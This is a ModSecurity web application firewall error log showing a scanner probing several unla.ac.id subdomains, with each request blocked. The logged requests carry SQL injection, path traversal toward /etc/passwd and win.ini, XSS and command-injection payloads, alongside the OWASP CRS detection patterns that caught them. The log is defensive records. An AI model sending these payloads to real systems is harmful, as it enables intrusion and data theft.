[Tue Aug 29 11:47:17.938473 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VcCo-f0AAAjYrCIAAAAK"]
[Tue Aug 29 11:47:18.432636 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAj@-tsAAAAI"]
[Tue Aug 29 11:47:18.453488 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAj1138AAAAa"]
[Tue Aug 29 11:47:18.479179 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAhui78AAAAr"]
[Tue Aug 29 11:47:18.498629 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAh132wAAAAz"]
[Tue Aug 29 11:47:18.519088 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAh1320AAAAz"]
[Tue Aug 29 11:47:19.408363 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAhui8QAAAAr"]
[Tue Aug 29 11:47:19.410145 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjCbFIAAAAB"]
[Tue Aug 29 11:47:19.429503 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAj@-uQAAAAI"]
[Tue Aug 29 11:47:19.485669 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjCbFQAAAAB"]
[Tue Aug 29 11:47:19.489708 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjdQNMAAAAZ"]
[Tue Aug 29 11:47:19.517050 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjCbFUAAAAB"]
[Tue Aug 29 11:47:19.519022 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjdQNQAAAAZ"]
[Tue Aug 29 11:47:19.579511 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAi@TDYAAAAM"]
[Tue Aug 29 11:47:19.591393 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjM7D4AAAAT"]
[Tue Aug 29 11:47:19.595031 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjCbFkAAAAB"]
[Tue Aug 29 11:47:19.611974 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjM7D8AAAAT"]
[Tue Aug 29 11:47:20.429269 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14WMCo-f0AAAjIhooAAAAJ"]
[Tue Aug 29 11:47:20.596401 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14WMCo-f0AAAjM7EQAAAAT"]
[Tue Aug 29 11:47:22.421326 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAkAL6IAAAAU"]
[Tue Aug 29 11:47:22.422078 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAj@-ucAAAAI"]
[Tue Aug 29 11:47:22.445323 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAkBKlcAAAAb"]
[Tue Aug 29 11:47:22.449616 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAhT3-4AAAAD"]
[Tue Aug 29 11:47:22.587740 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAhT4AAAAAAD"]
[Tue Aug 29 11:47:23.363771 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjZRZ0AAAAS"]
[Tue Aug 29 11:47:23.382414 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAkBKlsAAAAb"]
[Tue Aug 29 11:47:23.387023 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjrbHoAAAAP"]
[Tue Aug 29 11:47:23.426560 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjrbHwAAAAP"]
[Tue Aug 29 11:47:23.430792 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjZRaAAAAAS"]
[Tue Aug 29 11:47:23.512257 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO14W8Co-f0AAAjZRaQAAAAS"]
[Tue Aug 29 11:47:24.375063 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14XMCo-f0AAAjrbIIAAAAP"]
